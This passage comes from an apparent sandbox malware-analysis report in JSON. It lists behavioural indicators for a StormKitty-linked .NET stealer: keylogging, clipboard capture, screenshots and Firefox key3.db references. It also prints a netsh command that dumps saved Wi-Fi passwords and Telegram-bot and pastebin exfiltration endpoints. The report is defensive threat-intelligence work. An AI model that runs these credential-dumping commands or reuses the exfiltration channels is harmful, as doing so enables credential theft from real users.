\"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"C chcp 65001 && netsh wlan show profile | findstr All\" (Indicator: \"findstr \"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"key=clear | findstr Key\" (Indicator: \"findstr \"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-556", "type": 2, "relevance": 1, "name": "Found strings related to keylogger", "description": "Found string \"[ESC]\" (Indicator: \"[esc]\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"[Shift]\" (Indicator: \"[shift]\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"[CAPSLOCK: OFF]\" (Indicator: \"[CAPSLOCK: OFF]\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-107", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the host's architecture (API string)", "description": "Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetEnvironmentVariable\" (Indicator: \"GetEnvironmentVariable\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"577.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"Select ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"Select ProcessorId From Win32_processor\" (Indicator: \" Win32_Processor\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ct * from AntivirusProduct\" (Indicator: \"antivirusproduct\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"from Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \" Win32_OperatingSystem\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Processor\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"elect * from AntivirusProduct\" (Indicator: \"antivirusproduct\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Processor\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ELECT * FROM Win32_VideoController\" (Indicator: \" Win32_VideoController\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"elect * From Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \" Win32_PnPEntity\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"elect * from Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \" Win32_OperatingSystem\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Processor\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"elect * from AntivirusProduct\" (Indicator: \"antivirusproduct\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Processor\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_VideoController\" (Indicator: \" Win32_VideoController\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"elect * From Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \" Win32_PnPEntity\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"elect * from Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-405", "type": 2, "relevance": 1, "name": "References Firefox browser credentials files", "description": "Found string \"key3.db\" (Indicator: \"key3.db\"; in File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-100", "relevance": 1, "name": "Contains ability to gather process details (Dotnet)", "description": "Observed function \"get_ProcessName\" in \"577.exe\"\n Observed function \"GetProcessesByName\" in \"577.exe\"\n Observed function \"GetProcessById\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-163", "relevance": 1, "name": "Contains ability to collect clipboard information (Dotnet)", "description": "Observed Namespace \"System.Windows.Forms::Clipboard\" and MemberReference \"GetText\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-113", "relevance": 1, "name": "Contains ability to capture screenshot", "description": "Observed function \"System.Drawing.CopyFromScreen\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00001916)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"github.com/limerboy/stormkitty\"\n Pattern match: \"api.telegram.org/bot{0}/getupdates?offset={1\"\n Pattern match: \"m.org/file/bot\"\n Pattern match: \"https://raw.githubusercontent.com/limerboy/stormkitty/master/stormkitty/stub/packages/dotnetzip.1.13.8/lib/net40/dotnetzip.dll\"\n Pattern match: \"microsoft.net/framework/v2.0.50727/\"\n Heuristic match: \",b.md\"\n Heuristic match: \"tem.data.sqlserverce.so\"\n Heuristic match: \"`)8^.nf\"\n Pattern match: \"x.zq/*h\"\n Pattern match: \"a.fq/m#k\"\n Pattern match: \"g.zq/*h\"\n Pattern match: \"8g.zq/*h\"\n Heuristic match: \"($'l.ge\"\n Heuristic match: \"tcd76db.tm\"\n Heuristic match: \"tcd772f.tm\"\n Heuristic match: \"tcd776f.tm\"\n Pattern match: \"api.telegram.org/bot\"\n Pattern match: \"pastebin.com/raw/7b75u64b\"\n Pattern match: \"api.telegram.org/file/bot\"\n Pattern match: \"raw.githubusercontent.com/limerboy/stormkitty/master/stormkitty/stub/packages/dotnetzip.1.13.8/lib/net40/dotnetzip.dll\"\n Pattern match: \"microsoft.net/framework/v4.0.30319/\"\n Pattern match: \"http://go.microsoft.co\"\n Pattern match: \"http://go.microsoft.com/fwlink/?linkid=42127\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#dsa-sha1\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#rsa-sha512\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#sha512\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#ripemd160\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#des-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#tripledes-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-tripledes\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes128-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes128\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes192-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes192\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#aes256-cbc\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#kw-aes256\"\n Pattern match: \"http://www.w3.org/tr/2001/rec-xml-c14n-20010315\"\n Pattern match: \"http://www.w3.org/tr/2001/rec-xml-c14n-20010315#withcomments\"\n Pattern match: \"http://www.w3.org/2001/10/xml-exc-c14n#\"\n Pattern match: \"http://www.w3.org/2001/10/xml-exc-c14n#withcomments\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#base64\"\n Pattern match: \"http://www.w3.org/tr/1999/rec-xpath-19991116\"\n Pattern match: \"http://www.w3.org/tr/1999/rec-xslt-19991116\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#enveloped-signature\"\n Pattern match: \"http://www.w3.org/2002/07/decrypt#xml\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#\"\n Pattern match: \"http://www.w3.org/2001/04/xmlenc#\"\n Pattern match: \"http://www.w3.org/2000/09/xmldsig#hmac-sha1\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#md5\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-md5\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-ripemd160\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha256\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha384\"\n Pattern match: \"http://www.w3.org/2001/04/xmldsig-more#hmac-sha512\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"mscorlib,<IPv4>,,b77a5c561934e089,x86\"\n Potential IP \"<IPv4>\" found in string \"Microsoft.VisualBasic,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Xml,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Configuration,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Web,<IPv4>,,b03f5f7f11d50a3a,x86\"\n Potential IP \"<IPv4>\" found in string \"System.Management,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Runtime.Remoting,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Deployment,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Drawing,<IPv4>,,b03f5f7f11d50a3a,MSIL\"\n Potential IP \"<IPv4>\" found in string \"System.Windows.Forms,<IPv4>,,b77a5c561934e089,MSIL\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"osoft.VisualBasic,<IPv4>,,b03f5f7f11d50a3a\"\n Potential IP \"<IPv4>\" found in string \"ystem,<IPv4>,,b77a5c561934e089\"\n Potential IP \"<IPv4>\" found in string \"em.Configuration,<IPv4>,,b03f5f7f11d50a3a\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"n=<IPv4>, C\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>, Cul\"\n Potential IP \"<IPv4>\" found in string \"sion=<IPv4>'\"\n Potential IP \"<IPv4>\" found in string \"n=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" a.\", Potential IP \"<IPv4>\" found in string \"ion=<IPv4>\n Culture=neutral\n PublicKeyToken=b77a5c561934e089\"\"\n Potential IP \"<IPv4>\" found in string \"=<IPv4>, Culture=neutral, PublicKeyToken=b77a5c561934e089\"/>\", \"<IPv4>\", \"<IPv4>\", \"<IPv4>\", \"<IPv4>\", \"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-98", "type": 2, "relevance": 1, "name": "Possibly tries to communicate over SSL connection (HTTPS)", "description": "Found HTTPS url \"https://raw.githubusercontent.com\"", "origin": "File/Memory", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"https://github.com/limerboy/stormkitty>>%l\" - Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found URL \"http://go.microsoft.coink/?linkid=42127\" - Source: \"00000000-00005100.00000000.131007.00420000.00000004.mdmp\")\n Found URL \"http://user.configfile:.configfile://datadirectoryfile:http:\\\\?\\globalroot\" - Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")\n Found URL \"http://go.microsoft.com/fwlink/?linkid=42127\" - Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")\n Found URL \"http://www.w3.org/2000/09/xmldsig\" - Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")\n Found URL \"https://github.com/limerboy/stormkitty>>%l\" - Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found URL \"http://go.microsoft.coink/?linkid=42127\" - Source: \"00000000-00005100.00000001.132927.00420000.00000004.mdmp\")\n Found URL \"http://go.microsoft.coink/?linkid=42127\" - Source: \"00000000-00005100.00000002.134853.00420000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-186", "type": 2, "relevance": 1, "name": "Found domain strings related to cloud services(possible C&C communication)", "description": "Found string \"//api.telegram.org/bot{0}/getUpdates?offset={1}\" (Indicator: \"api.telegram.org\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll\" (Indicator: \"githubusercontent.com\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ttps://api.telegram.org/bot\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ttps://api.telegram.org/bot{0}/getUpdates?offset={1}\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ttps://api.telegram.org/file/bot\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ttps://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll\" (Indicator: \"githubusercontent.com\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ttps://api.telegram.org/bot\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ttps://api.telegram.org/bot{0}/getUpdates?offset={1}\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ttps://api.telegram.org/file/bot\" (Indicator: \"api.telegram.org\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ttps://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll\" (Indicator: \"githubusercontent.com\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-142", "relevance": 1, "name": "Contains ability to upload data with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \"UploadFile\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-151", "relevance": 1, "name": "Contains ability to communicates via socket (possible C&C communication)", "description": "Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"set_ReceiveBufferSize\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Connect\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"get_Connected\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-110", "relevance": 1, "name": "Contains ability to provide interface for network protocols (Dotnet)", "description": "Observed namespace \"System.Net\" in \"577.exe\"\n Observed namespace \"System.Net.NetworkInformation\" in \"577.exe\"\n Observed namespace \"System.Net.Http\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-158", "relevance": 1, "name": "Contains ability to communicate with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \".ctor\" in \"577.exe\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadString\" in \"577.exe\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"set_UseDefaultCredentials\" in \"577.exe\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadFile\" in \"577.exe\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"get_Headers\" in \"577.exe\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"UploadFile\" in \"577.exe\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"set_Credentials\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-159", "relevance": 1, "name": "Contains ability to communicate via sockets (Dotnet)", "description": "Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Close\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \".ctor\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"set_ReceiveBufferSize\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"set_SendBufferSize\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Connect\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"get_Connected\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.NetworkStream\" and MemberReference \".ctor\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"get_RemoteEndPoint\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Dispose\" in \"577.exe\"\n Observed Namespace \"System.Net.Sockets.Socket\" and MemberReference \"Poll\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-106", "type": 2, "relevance": 1, "name": "Contains ability to decode base64 data", "description": "Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\")\n file/memory contains long string with (Indicator: \"FromBase64String\"; File: \"577.exe\")\n Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp, 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-352", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption/decryption using RSA algorithm", "description": "file/memory contains long string with (Indicator: \"RSACryptoServiceProvider\"; File: \"577.exe\")\n Found string \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-357", "type": 2, "relevance": 1, "name": "Contains ability to decrypt data using RSA (Dotnet String)", "description": "Observed string: \"System.Security.Cryptography.RSACryptoServiceProvider.CreateDecryptor\" in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-445", "type": 2, "relevance": 1, "name": "Contains ability to perform AES decryption (Dotnet String)", "description": "Observed string: 